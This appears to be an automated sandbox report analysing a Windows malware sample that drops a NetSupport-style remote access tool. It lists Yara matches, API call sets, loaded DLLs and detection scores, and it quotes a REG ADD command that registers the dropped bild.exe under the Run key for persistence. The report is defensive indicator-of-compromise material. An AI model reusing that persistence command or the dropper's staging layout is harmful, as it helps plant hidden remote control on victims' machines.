                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,5_2_11032EE0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,4_2_110321E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110076F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11113880
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11113880
                                Source: Yara matchFile source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.3754800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7444, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7892, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 8168, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111158B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,5_2_111158B0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00407070
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115DB40
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004159840_2_00415984
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004084090_2_00408409
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E0450_2_0040E045
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042E8D40_2_0042E8D4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004130E60_2_004130E6
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041E94A0_2_0041E94A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D1D20_2_0040D1D2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F25E0_2_0041F25E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004032030_2_00403203
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BA1A0_2_0040BA1A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041FAC80_2_0041FAC8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042A35E0_2_0042A35E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422B780_2_00422B78
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412B3A0_2_00412B3A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DBE20_2_0040DBE2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004163F20_2_004163F2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EC970_2_0040EC97
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D5E40_2_0040D5E4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412DB50_2_00412DB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415DB90_2_00415DB9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041EE460_2_0041EE46
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F6930_2_0041F693
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405E960_2_00405E96
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00429EB00_2_00429EB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040276C0_2_0040276C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403FC50_2_00403FC5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414FB50_2_00414FB5
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110733B04_2_110733B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110295904_2_11029590
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11061C904_2_11061C90
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110330104_2_11033010
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111632204_2_11163220
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111674854_2_11167485
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110454F04_2_110454F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101B7604_2_1101B760
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111258B04_2_111258B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101BBA04_2_1101BBA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11087C604_2_11087C60
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110700904_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110804804_2_11080480
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115E9804_2_1115E980
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101C9C04_2_1101C9C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110088AB4_2_110088AB
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11061C905_2_11061C90
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110330105_2_11033010
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110733B05_2_110733B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111632205_2_11163220
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110295905_2_11029590
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111674855_2_11167485
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110454F05_2_110454F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101B7605_2_1101B760
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111258B05_2_111258B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101BBA05_2_1101BBA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11087C605_2_11087C60
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110700905_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110804805_2_11080480
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115E9805_2_1115E980
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101C9C05_2_1101C9C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110088AB5_2_110088AB
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 110B7A20 appears 40 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11146450 appears 1092 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11146EC0 appears 39 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1116F010 appears 70 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11029450 appears 1827 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 111603E3 appears 76 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11173663 appears 37 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1105DD10 appears 548 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11081BB0 appears 77 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1105DE40 appears 52 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11164010 appears 64 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041CDF0 appears 37 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041D870 appears 31 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041CEC0 appears 53 times
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs file.exe
                                Source: file.exe, 00000000.00000003.1727368341.00000000038BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: classification engineClassification label: mal88.rans.evad.winEXE@11/13@1/2
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11059C50 GetLastError,FormatMessageA,LocalFree,4_2_11059C50
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D440
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,4_2_1109D4D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,5_2_1109D440
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,5_2_1109D4D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00418BD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\PublicJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: *xE0_2_0041C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: *aD0_2_0041C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: 8yE0_2_0041C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_0041C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_0041C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_0041C131
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: file.exeVirustotal: Detection: 51%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
                                Source: unknownProcess created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: urlmon.dllJump to behavior
